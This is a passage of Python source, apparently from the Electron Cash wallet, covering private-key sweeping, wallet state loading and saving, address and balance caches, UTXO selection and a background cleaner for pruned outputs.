txin_type, privkey, compressed = bitcoin.deserialize_privkey(sec)
find_utxos_for_privkey(txin_type, privkey, compressed)
# do other lookups to increase support coverage
if is_minikey(sec):
# minikeys don't have a compressed byte
# we lookup both compressed and uncompressed pubkeys
find_utxos_for_privkey(txin_type, privkey, not compressed)
elif txin_type == 'p2pkh':
# WIF serialization does not distinguish p2pkh and p2pk
# we also search for pay-to-pubkey outputs
find_utxos_for_privkey('p2pk', privkey, compressed)
elif txin_type == 'p2sh':
raise ValueError(_("The specified WIF key '{}' is a p2sh WIF key. These key types cannot be swept.").format(sec))
except InputsMaxxed:
pass
if not inputs:
raise ValueError(_('No inputs found. (Note that inputs need to be confirmed)'))
return inputs, keypairs
def sweep(privkeys, network, config, recipient, fee=None, imax=100, sign_schnorr=False):
inputs, keypairs = sweep_preparations(privkeys, network, imax)
total = sum(i.get('value') for i in inputs)
if fee is None:
outputs = [(TYPE_ADDRESS, recipient, total)]
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
fee = config.estimate_fee(tx.estimated_size())
if total - fee < 0:
raise NotEnoughFunds(_('Not enough funds on address.') + '\nTotal: %d satoshis\nFee: %d'%(total, fee))
if total - fee < dust_threshold(network):
raise NotEnoughFunds(_('Not enough funds on address.') + '\nTotal: %d satoshis\nFee: %d\nDust Threshold: %d'%(total, fee, dust_threshold(network)))
outputs = [(TYPE_ADDRESS, recipient, total - fee)]
locktime = network.get_local_height()
tx = Transaction.from_io(inputs, outputs, locktime=locktime, sign_schnorr=sign_schnorr)
tx.BIP_LI01_sort()
tx.sign(keypairs)
return tx
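# Minimal usage sketch for the sweep helpers above (illustrative only: the WIF key
# and recipient address are placeholders, and broadcasting the signed tx is left to
# the caller via its Network object):
#
#   tx = sweep(['<WIF private key>'], network, config, recipient_address)
#   # `tx` is a signed Transaction spending the UTXOs found for the swept key(s)
#   # (up to imax), sending (total - fee) to `recipient_address`.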
class Abstract_Wallet(PrintError, SPVDelegate):
"""
Wallet classes are created to handle various address generation methods.
Completion states (watching-only, single account, no seed, etc) are handled inside classes.
"""
max_change_outputs = 3
def __init__(self, storage):
self.electrum_version = PACKAGE_VERSION
self.storage = storage
self.thread = None # this is used by the qt main_window to store a QThread. We just make sure it's always defined as an attribute here.
self.network = None
# verifier (SPV) and synchronizer are started in start_threads
self.synchronizer = None
self.verifier = None
self.weak_window = None # Some of the GUI classes, such as the Qt ElectrumWindow, use this to refer back to themselves. This should always be a weakref.ref (Weak.ref), or None
# CashAccounts subsystem. Its network-dependent layer is started in
# start_threads. Note: object instantiation should be lightweight here.
# self.cashacct.load() is called later in this function to load data.
self.cashacct = cashacct.CashAcct(self)
self.slp = slp.WalletData(self)
finalization_print_error(self.cashacct) # debug object lifecycle
finalization_print_error(self.slp) # debug object lifecycle
# Removes defunct entries from self.pruned_txo asynchronously
self.pruned_txo_cleaner_thread = None
# Cache of Address -> (c,u,x) balance. This cache is used by
# get_addr_balance to significantly speed it up (it is called a lot).
# Cache entries are invalidated when tx's are seen involving this
        # address (address history changes). Entries to this cache are added
# only inside get_addr_balance.
# Note that this data structure is touched by the network and GUI
# thread concurrently without the use of locks, because Python GIL
# allows us to get away with such things. As such do not iterate over
# this dict, but simply add/remove items to/from it in 1-liners (which
# Python's GIL makes thread-safe implicitly).
self._addr_bal_cache = {}
        # We keep sets of the receiving and change addresses so that is_mine()
        # checks are constant-time rather than O(N). This creates/resets that cache.
self.invalidate_address_set_cache()
self.gap_limit_for_change = 20 # constant
# saved fields
self.use_change = storage.get('use_change', True)
self.multiple_change = storage.get('multiple_change', False)
self.labels = storage.get('labels', {})
# Frozen addresses
frozen_addresses = storage.get('frozen_addresses',[])
self.frozen_addresses = set(Address.from_string(addr)
for addr in frozen_addresses)
# Frozen coins (UTXOs) -- note that we have 2 independent levels of "freezing": address-level and coin-level.
# The two types of freezing are flagged independently of each other and 'spendable' is defined as a coin that satisfies
# BOTH levels of freezing.
self.frozen_coins = set(storage.get('frozen_coins', []))
self.frozen_coins_tmp = set() # in-memory only
self.change_reserved = set(Address.from_string(a) for a in storage.get('change_reserved', ()))
self.change_reserved_default = [Address.from_string(a) for a in storage.get('change_reserved_default', ())]
self.change_unreserved = [Address.from_string(a) for a in storage.get('change_unreserved', ())]
self.change_reserved_tmp = set() # in-memory only
# address -> list(txid, height)
history = storage.get('addr_history',{})
self._history = self.to_Address_dict(history)
# there is a difference between wallet.up_to_date and interface.is_up_to_date()
# interface.is_up_to_date() returns true when all requests have been answered and processed
# wallet.up_to_date is true when the wallet is synchronized (stronger requirement)
self.up_to_date = False
# The only lock. We used to have two here. That was more technical debt
# without much purpose. 1 lock is sufficient. In particular data
# structures that are touched by the network thread as well as the GUI
# (such as self.transactions, history, etc) need to be synchronized
# using this mutex.
self.lock = threading.RLock()
# load requests
requests = self.storage.get('payment_requests', {})
for key, req in requests.items():
req['address'] = Address.from_string(key)
self.receive_requests = {req['address']: req
for req in requests.values()}
# Transactions pending verification. A map from tx hash to transaction
# height. Access is contended so a lock is needed. Client code should
# use get_unverified_tx to get a thread-safe copy of this dict.
self.unverified_tx = defaultdict(int)
# Verified transactions. Each value is a (height, timestamp, block_pos) tuple. Access with self.lock.
self.verified_tx = storage.get('verified_tx3', {})
# save wallet type the first time
if self.storage.get('wallet_type') is None:
self.storage.put('wallet_type', self.wallet_type)
# invoices and contacts
self.invoices = InvoiceStore(self.storage)
self.contacts = Contacts(self.storage)
# cashacct is started in start_threads, but it needs to have relevant
# data here, before the below calls happen
self.cashacct.load()
self.slp.load() # try to load first so we can pick up the remove_transaction hook from load_transactions if need be
# Now, finally, after object is constructed -- we can do this
self.load_keystore_wrapper()
self.load_addresses()
self.load_transactions()
self.build_reverse_history()
self.check_history()
if self.slp.need_rebuild:
# load failed, must rebuild from self.transactions
self.slp.rebuild()
self.slp.save() # commit changes to self.storage
# Print debug message on finalization
finalization_print_error(self, "[{}/{}] finalized".format(type(self).__name__, self.diagnostic_name()))
@classmethod
def to_Address_dict(cls, d):
        '''Convert a dict of strings to a dict of Address objects.'''
return {Address.from_string(text): value for text, value in d.items()}
@classmethod
def from_Address_dict(cls, d):
'''Convert a dict of Address objects to a dict of strings.'''
return {addr.to_storage_string(): value
for addr, value in d.items()}
def diagnostic_name(self):
return self.basename()
def __str__(self):
return self.basename()
def get_master_public_key(self):
return None
def load_keystore_wrapper(self):
""" Loads the keystore, but also tries to preserve derivation(s). Older
Electron Cash versions would not save the derivation for all keystore
types. So this function ensures:
1. That on first run, we store the keystore_derivations to top-level
storage (which is preserved always).
2. On subsequent runs we try and load the keystore_derivations from
storage and restore them if the individual keystore.derivation data
items were lost (because user loaded wallet with older Electron
Cash).
This function is provided to allow users to switch between old and new
EC versions. In the future if we deprecate the wallet format, or if
enough time has passed, this function may be removed and the simple
self.load_keystore() may be used instead. """
self.load_keystore()
if not hasattr(self, 'get_keystores'):
return
from .keystore import Deterministic_KeyStore, Old_KeyStore
keystores = self.get_keystores()
keystore_derivations = self.storage.get('keystore_derivations', [])
if len(keystore_derivations) != len(keystores):
keystore_derivations = [None] * len(keystores)
updated, updated_ks, updated_st = False, False, False
for i, keystore in enumerate(keystores):
if i == 0 and isinstance(keystore, Deterministic_KeyStore) and not keystore.seed_type:
# Attempt to update keystore.seed_type
if isinstance(keystore, Old_KeyStore):
keystore.seed_type = 'old'
updated_st = True
else:
# attempt to restore the seed_type based on wallet saved "seed_type"
typ = self.storage.get('seed_type')
if typ in ('standard', 'electrum'):
keystore.seed_type = 'electrum'
updated_st = True
elif typ == 'bip39':
keystore.seed_type = 'bip39'
updated_st = True
saved_der = keystore_derivations[i]
der = (keystore.has_derivation() and keystore.derivation) or None
if der != saved_der:
if der:
# keystore had a derivation, but top-level storage did not
# (this branch is typically taken on first run after
# restoring from seed or creating a new wallet)
keystore_derivations[i] = saved_der = der
updated = True
elif saved_der:
# we had a derivation but keystore did not. This branch is
# taken if the user has loaded this wallet with an older
# version of Electron Cash. Attempt to restore their
# derivation item in keystore.
                    keystore.derivation = saved_der # restore the saved derivation to the keystore
updated_ks = True # tell it to re-save
if updated:
self.print_error("Updated keystore_derivations")
self.storage.put('keystore_derivations', keystore_derivations)
if updated_ks or updated_st:
if updated_ks:
self.print_error("Updated keystore (lost derivations restored)")
if updated_st:
self.print_error("Updated keystore (lost seed_type restored)")
self.save_keystore()
if any((updated, updated_ks, updated_st)):
self.storage.write()
@profiler
def load_transactions(self):
txi = self.storage.get('txi', {})
self.txi = {tx_hash: self.to_Address_dict(value)
for tx_hash, value in txi.items()
# skip empty entries to save memory and disk space
if value}
txo = self.storage.get('txo', {})
self.txo = {tx_hash: self.to_Address_dict(value)
for tx_hash, value in txo.items()
# skip empty entries to save memory and disk space
if value}
self.tx_fees = self.storage.get('tx_fees', {})
self.pruned_txo = self.storage.get('pruned_txo', {})
self.pruned_txo_values = set(self.pruned_txo.values())
tx_list = self.storage.get('transactions', {})
self.transactions = {}
for tx_hash, raw in tx_list.items():
tx = Transaction(raw)
self.transactions[tx_hash] = tx
if not self.txi.get(tx_hash) and not self.txo.get(tx_hash) and (tx_hash not in self.pruned_txo_values):
self.print_error("removing unreferenced tx", tx_hash)
self.transactions.pop(tx_hash)
self.cashacct.remove_transaction_hook(tx_hash)
self.slp.rm_tx(tx_hash)
@profiler
def save_transactions(self, write=False):
with self.lock:
tx = {}
for k,v in self.transactions.items():
tx[k] = str(v)
self.storage.put('transactions', tx)
txi = {tx_hash: self.from_Address_dict(value)
for tx_hash, value in self.txi.items()
# skip empty entries to save memory and disk space
if value}
txo = {tx_hash: self.from_Address_dict(value)
for tx_hash, value in self.txo.items()
# skip empty entries to save memory and disk space
if value}
self.storage.put('txi', txi)
self.storage.put('txo', txo)
self.storage.put('tx_fees', self.tx_fees)
self.storage.put('pruned_txo', self.pruned_txo)
history = self.from_Address_dict(self._history)
self.storage.put('addr_history', history)
self.slp.save()
if write:
self.storage.write()
def save_verified_tx(self, write=False):
with self.lock:
self.storage.put('verified_tx3', self.verified_tx)
self.cashacct.save()
if write:
self.storage.write()
def save_change_reservations(self):
with self.lock:
self.storage.put('change_reserved_default', [a.to_storage_string() for a in self.change_reserved_default])
self.storage.put('change_reserved', [a.to_storage_string() for a in self.change_reserved])
unreserved = self.change_unreserved + list(self.change_reserved_tmp)
self.storage.put('change_unreserved', [a.to_storage_string() for a in unreserved])
def clear_history(self):
with self.lock:
self.txi = {}
self.txo = {}
self.tx_fees = {}
self.pruned_txo = {}
self.pruned_txo_values = set()
self.slp.clear()
self.save_transactions()
self._addr_bal_cache = {}
self._history = {}
self.tx_addr_hist = defaultdict(set)
self.cashacct.on_clear_history()
@profiler
def build_reverse_history(self):
self.tx_addr_hist = defaultdict(set)
for addr, hist in self._history.items():
for tx_hash, h in hist:
self.tx_addr_hist[tx_hash].add(addr)
@profiler
def check_history(self):
save = False
my_addrs = [addr for addr in self._history if self.is_mine(addr)]
for addr in set(self._history) - set(my_addrs):
self._history.pop(addr)
save = True
for addr in my_addrs:
hist = self._history[addr]
for tx_hash, tx_height in hist:
if tx_hash in self.pruned_txo_values or self.txi.get(tx_hash) or self.txo.get(tx_hash):
continue
tx = self.transactions.get(tx_hash)
if tx is not None:
self.add_transaction(tx_hash, tx)
save = True
if save:
self.save_transactions()
self.cashacct.save()
def basename(self):
return os.path.basename(self.storage.path)
def save_addresses(self):
addr_dict = {
'receiving': [addr.to_storage_string()
for addr in self.receiving_addresses],
'change': [addr.to_storage_string()
for addr in self.change_addresses],
}
self.storage.put('addresses', addr_dict)
def load_addresses(self):
d = self.storage.get('addresses', {})
if not isinstance(d, dict):
d = {}
self.receiving_addresses = Address.from_strings(d.get('receiving', []))
self.change_addresses = Address.from_strings(d.get('change', []))
def synchronize(self):
pass
def is_deterministic(self):
return self.keystore.is_deterministic()
def set_up_to_date(self, up_to_date):
with self.lock:
self.up_to_date = up_to_date
if up_to_date:
self.save_transactions()
# if the verifier is also up to date, persist that too;
# otherwise it will persist its results when it finishes
if self.verifier and self.verifier.is_up_to_date():
self.save_verified_tx()
self.storage.write()
def is_up_to_date(self):
with self.lock: return self.up_to_date
def is_fully_settled_down(self):
''' Returns True iff the wallet is up to date and its synchronizer
        and verifier aren't busy doing work, and its pruned_txo_values set
is currently empty. This is used as a final check by the Qt GUI
to decide if it should do a final refresh of all tabs in some cases.'''
with self.lock:
ret = self.up_to_date
if ret and self.verifier:
ret = self.verifier.is_up_to_date()
if ret and self.synchronizer:
ret = self.synchronizer.is_up_to_date()
ret = ret and not self.pruned_txo_values
return bool(ret)
def set_label(self, name, text = None):
with self.lock:
if isinstance(name, Address):
name = name.to_storage_string()
changed = False
old_text = self.labels.get(name)
if text:
text = text.replace("\n", " ")
if old_text != text:
self.labels[name] = text
changed = True
else:
if old_text:
self.labels.pop(name)
changed = True
if changed:
run_hook('set_label', self, name, text)
self.storage.put('labels', self.labels)
return changed
def invalidate_address_set_cache(self):
''' This should be called from functions that add/remove addresses
from the wallet to ensure the address set caches are empty, in
        particular from ImportedWallets which may add/delete addresses,
        in which case the length check in is_mine() alone may not detect the change.
Deterministic wallets can neglect to call this function since their
address sets only grow and never shrink and thus the length check
of is_mine below is sufficient.'''
self._recv_address_set_cached, self._change_address_set_cached = frozenset(), frozenset()
def is_mine(self, address):
''' Note this method assumes that the entire address set is
composed of self.get_change_addresses() + self.get_receiving_addresses().
In subclasses, if that is not the case -- REIMPLEMENT this method! '''
assert not isinstance(address, str)
# assumption here is get_receiving_addresses and get_change_addresses
# are cheap constant-time operations returning a list reference.
# If that is not the case -- reimplement this function.
ra, ca = self.get_receiving_addresses(), self.get_change_addresses()
# Detect if sets changed (addresses added/removed).
# Note the functions that add/remove addresses should invalidate this
# cache using invalidate_address_set_cache() above.
if len(ra) != len(self._recv_address_set_cached):
# re-create cache if lengths don't match
self._recv_address_set_cached = frozenset(ra)
if len(ca) != len(self._change_address_set_cached):
# re-create cache if lengths don't match
self._change_address_set_cached = frozenset(ca)
        # Do two constant-time set-membership checks rather than two O(N) list
        # scans (the previous approach). For small wallets it doesn't matter,
        # but for wallets with 5k or 10k addresses it adds up, since is_mine()
        # is called frequently, especially while downloading address history.
return (address in self._recv_address_set_cached
or address in self._change_address_set_cached)
def is_change(self, address):
assert not isinstance(address, str)
ca = self.get_change_addresses()
if len(ca) != len(self._change_address_set_cached):
# re-create cache if lengths don't match
self._change_address_set_cached = frozenset(ca)
return address in self._change_address_set_cached
def get_address_index(self, address):
try:
return False, self.receiving_addresses.index(address)
except ValueError:
pass
try:
return True, self.change_addresses.index(address)
except ValueError:
pass
assert not isinstance(address, str)
raise Exception("Address {} not found".format(address))
def export_private_key(self, address, password):
""" extended WIF format """
if self.is_watching_only():
return []
index = self.get_address_index(address)
pk, compressed = self.keystore.get_private_key(index, password)
return bitcoin.serialize_privkey(pk, compressed, self.txin_type)
def get_public_keys(self, address):
sequence = self.get_address_index(address)
return self.get_pubkeys(*sequence)
def add_unverified_tx(self, tx_hash, tx_height):
with self.lock:
if tx_height == 0 and tx_hash in self.verified_tx:
self.verified_tx.pop(tx_hash)
if self.verifier:
self.verifier.merkle_roots.pop(tx_hash, None)
# tx will be verified only if height > 0
if tx_hash not in self.verified_tx:
self.unverified_tx[tx_hash] = tx_height
self.cashacct.add_unverified_tx_hook(tx_hash, tx_height)
def add_verified_tx(self, tx_hash, info, header):
        # Remove from the unverified map and add to the verified map.
with self.lock:
self.unverified_tx.pop(tx_hash, None)
self.verified_tx[tx_hash] = info # (tx_height, timestamp, pos)
height, conf, timestamp = self.get_tx_height(tx_hash)
self.cashacct.add_verified_tx_hook(tx_hash, info, header)
self.network.trigger_callback('verified2', self, tx_hash, height, conf, timestamp)
def verification_failed(self, tx_hash, reason):
''' TODO: Notify gui of this if it keeps happening, try a different
server, rate-limited retries, etc '''
self.cashacct.verification_failed_hook(tx_hash, reason)
def get_unverified_txs(self):
'''Returns a map from tx hash to transaction height'''
with self.lock:
return self.unverified_tx.copy()
def get_unverified_tx_pending_count(self):
''' Returns the number of unverified tx's that are confirmed and are
still in process and should be verified soon.'''
with self.lock:
return len([1 for height in self.unverified_tx.values() if height > 0])
def undo_verifications(self, blockchain, height):
'''Used by the verifier when a reorg has happened'''
txs = set()
with self.lock:
for tx_hash, item in list(self.verified_tx.items()):
tx_height, timestamp, pos = item
if tx_height >= height:
header = blockchain.read_header(tx_height)
# fixme: use block hash, not timestamp
if not header or header.get('timestamp') != timestamp:
self.verified_tx.pop(tx_hash, None)
txs.add(tx_hash)
if txs: self.cashacct.undo_verifications_hook(txs)
if txs:
self._addr_bal_cache = {} # this is probably not necessary -- as the receive_history_callback will invalidate bad cache items -- but just to be paranoid we clear the whole balance cache on reorg anyway as a safety measure
return txs
def get_local_height(self):
""" return last known height if we are offline """
return self.network.get_local_height() if self.network else self.storage.get('stored_height', 0)
def get_tx_height(self, tx_hash):
""" return the height and timestamp of a verified transaction. """
with self.lock:
if tx_hash in self.verified_tx:
height, timestamp, pos = self.verified_tx[tx_hash]
conf = max(self.get_local_height() - height + 1, 0)
return height, conf, timestamp
elif tx_hash in self.unverified_tx:
height = self.unverified_tx[tx_hash]
return height, 0, 0
else:
return 0, 0, 0
def get_tx_block_hash(self, tx_hash):
''' Only works for tx's in wallet, for which we know the height. '''
height, ign, ign2 = self.get_tx_height(tx_hash)
return self.get_block_hash(height)
def get_block_hash(self, height):
        '''Convenience method equivalent to Blockchain.get_hash(), except our
version returns None instead of NULL_HASH_HEX on 'not found' header. '''
ret = None
if self.network and height is not None and height >= 0 and height <= self.get_local_height():
bchain = self.network.blockchain()
if bchain:
ret = bchain.get_hash(height)
if ret == NULL_HASH_HEX:
# if hash was NULL (all zeroes), prefer to return None
ret = None
return ret
def get_txpos(self, tx_hash):
"return position, even if the tx is unverified"
with self.lock:
if tx_hash in self.verified_tx:
height, timestamp, pos = self.verified_tx[tx_hash]
return height, pos
elif tx_hash in self.unverified_tx:
height = self.unverified_tx[tx_hash]
return (height, 0) if height > 0 else ((1e9 - height), 0)
else:
return (1e9+1, 0)
def is_found(self):
return any(value for value in self._history.values())
def get_num_tx(self, address):
""" return number of transactions where address is involved """
return len(self.get_address_history(address))
def get_tx_delta(self, tx_hash, address):
        "effect of tx on address"
        assert isinstance(address, Address)
# pruned
if tx_hash in self.pruned_txo_values:
return None
delta = 0
        # subtract the value of coins sent from address
d = self.txi.get(tx_hash, {}).get(address, [])
for n, v in d:
delta -= v
# add the value of the coins received at address
d = self.txo.get(tx_hash, {}).get(address, [])
for n, v, cb in d:
delta += v
return delta
def get_wallet_delta(self, tx):
""" effect of tx on wallet """
is_relevant = False
is_mine = False
is_pruned = False
is_partial = False
v_in = v_out = v_out_mine = 0
for item in tx.inputs():
addr = item['address']
if self.is_mine(addr):
is_mine = True
is_relevant = True
d = self.txo.get(item['prevout_hash'], {}).get(addr, [])
for n, v, cb in d:
if n == item['prevout_n']:
value = v
break
else:
value = None
if value is None:
is_pruned = True
else:
v_in += value
else:
is_partial = True
if not is_mine:
is_partial = False
for _type, addr, value in tx.outputs():
v_out += value
if self.is_mine(addr):
v_out_mine += value
is_relevant = True
if is_pruned:
# some inputs are mine:
fee = None
if is_mine:
v = v_out_mine - v_out
else:
# no input is mine
v = v_out_mine
else:
v = v_out_mine - v_in
if is_partial:
# some inputs are mine, but not all
fee = None
else:
# all inputs are mine
fee = v_in - v_out
if not is_mine:
fee = None
return is_relevant, is_mine, v, fee
def get_tx_info(self, tx):
is_relevant, is_mine, v, fee = self.get_wallet_delta(tx)
exp_n = None
can_broadcast = False
label = ''
height = conf = timestamp = None
tx_hash = tx.txid()
if tx.is_complete():
if tx_hash in self.transactions:
label = self.get_label(tx_hash)
height, conf, timestamp = self.get_tx_height(tx_hash)
if height > 0:
if conf:
status = ngettext("{conf} confirmation", "{conf} confirmations", conf).format(conf=conf)
else:
status = _('Not verified')
else:
status = _('Unconfirmed')
if fee is None:
fee = self.tx_fees.get(tx_hash)
if fee and self.network and self.network.config.has_fee_estimates():
# NB: this branch will not be taken as has_fee_estimates()
# will always return false since we disabled querying
# the fee histogram as it's useless for BCH anyway.
size = tx.estimated_size()
fee_per_kb = fee * 1000 / size
exp_n = self.network.config.reverse_dynfee(fee_per_kb)
else:
status = _("Signed")
can_broadcast = self.network is not None
else:
s, r = tx.signature_count()
status = _("Unsigned") if s == 0 else _('Partially signed') + ' (%d/%d)'%(s,r)
if is_relevant:
if is_mine:
if fee is not None:
amount = v + fee
else:
amount = v
else:
amount = v
else:
amount = None
return tx_hash, status, label, can_broadcast, amount, fee, height, conf, timestamp, exp_n
def get_addr_io(self, address):
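        # Build two maps for `address` from its history:
        #   received: "txid:n" -> (height, value, is_coinbase) for each output paying this address
        #   sent:     "txid:n" -> height of the transaction that spent that output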
h = self.get_address_history(address)
received = {}
sent = {}
for tx_hash, height in h:
l = self.txo.get(tx_hash, {}).get(address, [])
for n, v, is_cb in l:
received[tx_hash + ':%d'%n] = (height, v, is_cb)
for tx_hash, height in h:
l = self.txi.get(tx_hash, {}).get(address, [])
for txi, v in l:
sent[txi] = height
return received, sent
def get_addr_utxo(self, address):
coins, spent = self.get_addr_io(address)
for txi in spent:
coins.pop(txi)
# cleanup/detect if the 'frozen coin' was spent and remove it from the frozen coin set
self.frozen_coins.discard(txi)
self.frozen_coins_tmp.discard(txi)
out = {}
for txo, v in coins.items():
tx_height, value, is_cb = v
prevout_hash, prevout_n = txo.split(':')
x = {
'address':address,
'value':value,
'prevout_n':int(prevout_n),
'prevout_hash':prevout_hash,
'height':tx_height,
'coinbase':is_cb,
'is_frozen_coin':txo in self.frozen_coins or txo in self.frozen_coins_tmp,
'slp_token':self.slp.token_info_for_txo(txo), # (token_id_hex, qty) tuple or None
}
out[txo] = x
return out
# return the total amount ever received by an address
def get_addr_received(self, address):
received, sent = self.get_addr_io(address)
return sum([v for height, v, is_cb in received.values()])
def get_addr_balance(self, address, exclude_frozen_coins=False):
''' Returns the balance of a bitcoin address as a tuple of:
(confirmed_matured, unconfirmed, unmatured)
Note that 'exclude_frozen_coins = True' only checks for coin-level
freezing, not address-level. '''
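        # All three components are in satoshis: c = confirmed & matured,
        # u = unconfirmed, x = unmatured coinbase.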
assert isinstance(address, Address)
mempoolHeight = self.get_local_height() + 1
if not exclude_frozen_coins: # we do not use the cache when excluding frozen coins as frozen status is a dynamic quantity that can change at any time in the UI
cached = self._addr_bal_cache.get(address)
if cached is not None:
return cached
received, sent = self.get_addr_io(address)
c = u = x = 0
had_cb = False
for txo, (tx_height, v, is_cb) in received.items():
if exclude_frozen_coins and (txo in self.frozen_coins or txo in self.frozen_coins_tmp):
continue
had_cb = had_cb or is_cb # remember if this address has ever seen a coinbase txo
if is_cb and tx_height + COINBASE_MATURITY > mempoolHeight:
x += v
elif tx_height > 0:
c += v
else:
u += v
if txo in sent:
if sent[txo] > 0:
c -= v
else:
u -= v
result = c, u, x
if not exclude_frozen_coins and not had_cb:
# Cache the results.
# Cache needs to be invalidated if a transaction is added to/
# removed from addr history. (See self._addr_bal_cache calls
# related to this littered throughout this file).
#
# Note that as a performance tweak we don't ever cache balances for
# addresses involving coinbase coins. The rationale being as
# follows: Caching of balances of the coinbase addresses involves
# a dynamic quantity: maturity of the coin (which considers the
# ever-changing block height).
#
# There wasn't a good place in this codebase to signal the maturity
# happening (and thus invalidate the cache entry for the exact
# address that holds the coinbase coin in question when a new
# block is found that matures a coinbase coin).
#
# In light of that fact, a possible approach would be to invalidate
# this entire cache when a new block arrives (this is what Electrum
# does). However, for Electron Cash with its focus on many addresses
# for future privacy features such as integrated CashShuffle --
# being notified in the wallet and invalidating the *entire* cache
# whenever a new block arrives (which is the exact time you do
# the most GUI refreshing and calling of this function) seems a bit
# heavy-handed, just for sake of the (relatively rare, for the
# average user) coinbase-carrying addresses.
#
# It's not a huge performance hit for the coinbase addresses to
# simply not cache their results, and have this function recompute
# their balance on each call, when you consider that as a
# consequence of this policy, all the other addresses that are
# non-coinbase can benefit from a cache that stays valid for longer
# than 1 block (so long as their balances haven't changed).
self._addr_bal_cache[address] = result
return result
def get_spendable_coins(self, domain, config, isInvoice = False):
confirmed_only = config.get('confirmed_only', DEFAULT_CONFIRMED_ONLY)
if (isInvoice):
confirmed_only = True
return self.get_utxos(domain, exclude_frozen=True, mature=True, confirmed_only=confirmed_only, exclude_slp=True)
def get_utxos(self, domain = None, exclude_frozen = False, mature = False, confirmed_only = False,
*, addr_set_out = None, exclude_slp = True):
'''Note that exclude_frozen = True checks for BOTH address-level and
coin-level frozen status.
exclude_slp skips coins that also have SLP tokens on them. This defaults
to True in EC 4.0.10+ in order to prevent inadvertently burning tokens.
Optional kw-only arg `addr_set_out` specifies a set in which to add all
addresses encountered in the utxos returned. '''
with self.lock:
mempoolHeight = self.get_local_height() + 1
coins = []
if domain is None:
domain = self.get_addresses()
if exclude_frozen:
domain = set(domain) - self.frozen_addresses
for addr in domain:
utxos = self.get_addr_utxo(addr)
len_before = len(coins)
for x in utxos.values():
if exclude_slp and x['slp_token']:
continue
if exclude_frozen and x['is_frozen_coin']:
continue
if confirmed_only and x['height'] <= 0:
continue
# A note about maturity: Previous versions of Electrum
# and Electron Cash were off by one. Maturity is
# calculated based off mempool height (chain tip height + 1).
# See bitcoind consensus/tx_verify.cpp Consensus::CheckTxInputs
# and also txmempool.cpp CTxMemPool::removeForReorg.
if mature and x['coinbase'] and mempoolHeight - x['height'] < COINBASE_MATURITY:
continue
coins.append(x)
if addr_set_out is not None and len(coins) > len_before:
# add this address to the address set if it has results
addr_set_out.add(addr)
return coins
def dummy_address(self):
return self.get_receiving_addresses()[0]
def get_addresses(self):
return self.get_receiving_addresses() + self.get_change_addresses()
def get_change_addresses(self):
''' Reimplemented in subclasses for wallets that have a change address set/derivation path. '''
return []
def get_frozen_balance(self):
if not self.frozen_coins and not self.frozen_coins_tmp:
# performance short-cut -- get the balance of the frozen address set only IFF we don't have any frozen coins
return self.get_balance(self.frozen_addresses)
# otherwise, do this more costly calculation...
cc_no_f, uu_no_f, xx_no_f = self.get_balance(None, exclude_frozen_coins = True, exclude_frozen_addresses = True)
cc_all, uu_all, xx_all = self.get_balance(None, exclude_frozen_coins = False, exclude_frozen_addresses = False)
return (cc_all-cc_no_f), (uu_all-uu_no_f), (xx_all-xx_no_f)
def get_balance(self, domain=None, exclude_frozen_coins=False, exclude_frozen_addresses=False):
if domain is None:
domain = self.get_addresses()
if exclude_frozen_addresses:
domain = set(domain) - self.frozen_addresses
cc = uu = xx = 0
for addr in domain:
c, u, x = self.get_addr_balance(addr, exclude_frozen_coins)
cc += c
uu += u
xx += x
return cc, uu, xx
def get_address_history(self, address):
assert isinstance(address, Address)
return self._history.get(address, [])
def _clean_pruned_txo_thread(self):
''' Runs in the thread self.pruned_txo_cleaner_thread which is only
active if self.network. Cleans the self.pruned_txo dict and the
self.pruned_txo_values set of spends that are not relevant to the
wallet. The processing below is needed because as of 9/16/2019, Electron
Cash temporarily puts all spends that pass through add_transaction and
have an unparseable address (txi['address'] is None) into the dict
self.pruned_txo. This is necessary for handling tx's with esoteric p2sh
scriptSigs and detecting balance changes properly for txins
containing such scriptSigs. See #895. '''
def deser(ser):
prevout_hash, prevout_n = ser.split(':')
prevout_n = int(prevout_n)
return prevout_hash, prevout_n
def mkser(prevout_hash, prevout_n):
return f'{prevout_hash}:{prevout_n}'
def rm(ser, pruned_too=True, *, tup = None):
h, n = tup or deser(ser) # tup arg is for performance when caller already knows the info (avoid a redundant .split on ':')
s = txid_n[h]
s.discard(n)
if not s:
txid_n.pop(h, None)
if pruned_too:
with self.lock:
tx_hash = self.pruned_txo.pop(ser, None)
self.pruned_txo_values.discard(tx_hash)
def add(ser):
prevout_hash, prevout_n = deser(ser)
txid_n[prevout_hash].add(prevout_n)
def keep_running():
return bool(self.network and self.pruned_txo_cleaner_thread is me)
def can_do_work():
return bool(txid_n and self.is_up_to_date())
debug = False # set this to true here to get more verbose output
me = threading.current_thread()
q = me.q
me.txid_n = txid_n = defaultdict(set) # dict of prevout_hash -> set of prevout_n (int)
last = time.time()
try:
self.print_error(f"{me.name}: thread started")
with self.lock:
# Setup -- grab whatever was already in pruned_txo at thread
# start
for ser in self.pruned_txo:
h, n = deser(ser)
txid_n[h].add(n)
while keep_running():
try:
ser = q.get(timeout=5.0 if can_do_work() else 20.0)
if ser is None:
# quit thread
return
if ser.startswith('r_'):
# remove requested
rm(ser[2:], False)
else:
# ser was added
add(ser)
del ser
except queue.Empty:
pass
if not can_do_work():
continue
t0 = time.time()
if t0 - last < 1.0: # run no more often than once per second
continue
last = t0
defunct_ct = 0
for prevout_hash, s in txid_n.copy().items():
for prevout_n in s.copy():
ser = mkser(prevout_hash, prevout_n)
with self.lock:
defunct = ser not in self.pruned_txo
if defunct:
#self.print_error(f"{me.name}: skipping already-cleaned", ser)
rm(ser, False, tup=(prevout_hash, prevout_n))
defunct_ct += 1
continue
if defunct_ct and debug:
self.print_error(f"{me.name}: DEBUG", defunct_ct, "defunct txos removed in", time.time()-t0, "secs")
ct = 0
for prevout_hash, s in txid_n.copy().items():
try:
with self.lock:
tx = self.transactions.get(prevout_hash)
if tx is None:
tx = Transaction.tx_cache_get(prevout_hash)
if isinstance(tx, Transaction):
tx = Transaction(tx.raw) # take a copy
else:
if debug: self.print_error(f"{me.name}: DEBUG retrieving txid", prevout_hash, "...")
t1 = time.time()
tx = Transaction(self.network.synchronous_get(('blockchain.transaction.get', [prevout_hash])))
if debug: self.print_error(f"{me.name}: DEBUG network retrieve took", time.time()-t1, "secs")
# Paranoia; intended side effect of the below assert
# is to also deserialize the tx (by calling the slow
# .txid()) which ensures the tx from the server
# is not junk.
assert prevout_hash == tx.txid(), "txid mismatch"
